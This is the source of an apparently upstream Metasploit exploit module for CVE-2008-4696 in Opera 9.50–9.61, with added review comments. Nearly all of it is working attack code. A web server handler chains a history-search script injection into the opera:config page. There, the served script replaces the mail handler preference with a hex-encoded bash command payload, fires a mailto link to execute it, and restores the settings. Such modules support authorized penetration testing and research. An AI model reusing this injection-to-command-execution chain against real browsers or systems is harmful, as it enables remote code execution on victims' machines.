GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/opera_historysearch.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2008-4696. Opera's History Search results page does
# not escape certain constructs, so markup placed in a visited URL can end up
# as live script on that page; from there the served script changes
# configuration settings and runs a command (see 'Description' and
# on_request_uri below). Affected versions: Opera 9.50 through 9.61.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Provides the embedded HTTP server plus send_response_html / send_not_found.
  include Msf::Exploit::Remote::HttpServer::HTML

  # Left disabled upstream: BrowserAutopwn registration with a version check
  # (9.5 < v < 9.62). Only the explicit target below is active.
  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  #   :ua_name => HttpClients::OPERA,
  #   :javascript => true,
  #   :rank => ExcellentRanking, # reliable command execution
  #   :vuln_test => %Q{
  #     v = parseFloat(opera.version());
  #     if (9.5 < v && 9.62 > v) {
  #       is_vuln = true;
  #     }
  #   },
  # })

  # Module metadata: name, references, payload constraints and the single
  # active target (a unix command payload).
  #
  # @param info [Hash] extra module info merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Opera historysearch XSS',
        'Description' => %q{
          Certain constructs are not escaped correctly by Opera's History
          Search results. These can be used to inject scripts into the
          page, which can then be used to modify configuration settings
          and execute arbitrary commands. Affects Opera versions between
          9.50 and 9.61.
        },
        'License' => BSD_LICENSE,
        'Author' => [
          'Roberto Suggi', # Discovered the vulnerability
          'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec
          'egypt', # msf module
        ],
        'References' => [
          ['CVE', '2008-4696'],
          ['OSVDB', '49472'],
          ['BID', '31869'],
          ['URL', 'http://www.opera.com/support/kb/view/903/'],
        ],
        'Payload' => {
          'EXITFUNC' => 'process',
          'Space' => 4000,
          'DisableNops' => true,
          # Whitespace is excluded from the command payload.
          # NOTE(review): presumably so the command survives the %22-quoted
          # `/bin/bash -c` wrapper built in on_request_uri — confirm.
          'BadChars' => "\x09\x0a\x0d\x20",
          'Compat' =>
          {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl ruby telnet',
          }
        },
        'Platform' => %w{unix},
        'Targets' => [
          # A Windows target was sketched but never enabled upstream.
          # [ 'Automatic', { } ],
          # [ 'Opera < 9.61 Windows',
          #   {
          #     'Platform' => 'win',
          #     'Arch' => ARCH_X86,
          #   }
          # ],
          [
            'Opera < 9.61 Unix Cmd',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
            }
          ],
        ],
        'DisclosureDate' => '2008-10-23', # Date of full-disclosure post showing code exec
        'DefaultTarget' => 0,
        # Reliability/stability/side-effect notes were never filled in.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP request handler. Serves the three pages the module needs, keyed on
  # the request URI:
  #   * the module's base resource -> a page whose script navigates the
  #     top-level window to "<url>?history#<script src='<url>?jspayload=1'/><!--"
  #   * "...?history"   -> a page whose onload redirects to
  #     opera:historysearch?q=* (NOTE(review): presumably the unescaped
  #     fragment from the previous step is what gets rendered as markup
  #     there — the code does not show this, only the advisory text does)
  #   * "...?jspayload" -> the script that opens opera:config in an iframe,
  #     swaps the Mail/'External Application' preference for the payload
  #     command, triggers a mailto: link, then restores both preferences
  # Any other URI is answered with 404.
  #
  # @param cli the connected client; passed through to send_* and handler
  # @param request the parsed HTTP request; only #uri is inspected
  # @return [void]
  def on_request_uri(cli, request)
    # No extra response headers are set.
    headers = {}
    # Static wrapper shared by the history and base-resource pages.
    html_hdr = %Q^
        <html>
        <head>
        <title>Loading</title>
    ^
    html_ftr = %Q^
        </head>
        <body >
        <h1>Loading</h1>
        </body></html>
    ^

    case request.uri
    when /[?]jspayload/
      # Payload is regenerated per client; nothing to serve if that fails.
      p = regenerate_payload(cli)
      if (p.nil?)
        send_not_found(cli)
        return
      end
      # We're going to run this through unescape(), so make sure
      # everything is encoded
      penc = Rex::Text.to_hex(p.encoded, "%")
      # The served script runs inside the opera:config iframe via eval().
      # NOTE(review): the mailto address in the literal below reads
      # '[email protected]', which looks like an artifact of the page
      # rendering; check the upstream file for the actual literal.
      content =
        %Q{
        var s = document.createElement("iframe");

        s.src="opera:config";
        s.id="config_window";
        document.body.appendChild(s);
        config_window.eval(
          "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
          "old_app = opera.getPreference('Mail','External Application');" +
          "old_handler = opera.getPreference('Mail','Handler');" +
          "opera.setPreference('Mail','External Application',cmd);" +
          "opera.setPreference('Mail','Handler','2');" +
          "app_link = document.createElement('a');" +
          "app_link.setAttribute('href', 'mailto:[email protected]');" +
          "app_link.click();" +
          "setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
          "setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
          "");
        setTimeout(function () {window.location='about:blank'},1);
        }

    when /[?]history/
      # Second hop: redirect into the History Search page.
      js = %Q^
        window.onload = function() {
          location.href = "opera:historysearch?q=*";
        }
      ^
      content = %Q^
        #{html_hdr}
        <script><!--
        #{js}
        //--></script>
        #{html_ftr}
      ^
    when get_resource()
      # First hop: only acts when window.opera is present, walks up to the
      # top-most frame and navigates it to the ?history URL carrying the
      # injected <script> tag in the fragment.
      print_status("Sending #{self.name} for request #{request.uri}")

      js = %Q^
        if (window.opera) {
          var wnd = window;
          while (wnd.parent != wnd) {
            wnd = wnd.parent;
          }
          url = location.href;
          wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
        }
      ^
      content = %Q^
        #{html_hdr}
        <script><!--
        #{js}
        //--></script>
        #{html_ftr}
      ^
    else
      print_status("Sending 404 for request #{request.uri}")
      send_not_found(cli)
      return
    end
    # Strip the literal indentation (eight spaces) and tabs so the served
    # HTML/JS starts at column 0.
    # NOTE(review): this rendering dropped the file's original indentation;
    # the %Q bodies above are re-indented on the assumption that upstream
    # used eight spaces — confirm against the repository file before
    # relying on the exact whitespace of the response.
    content.gsub!(/^ {8}/, '')
    content.gsub!(/\t/, ' ')

    send_response_html(cli, content, headers)
    # Hand the client over to the payload handler.
    handler(cli)
  end
end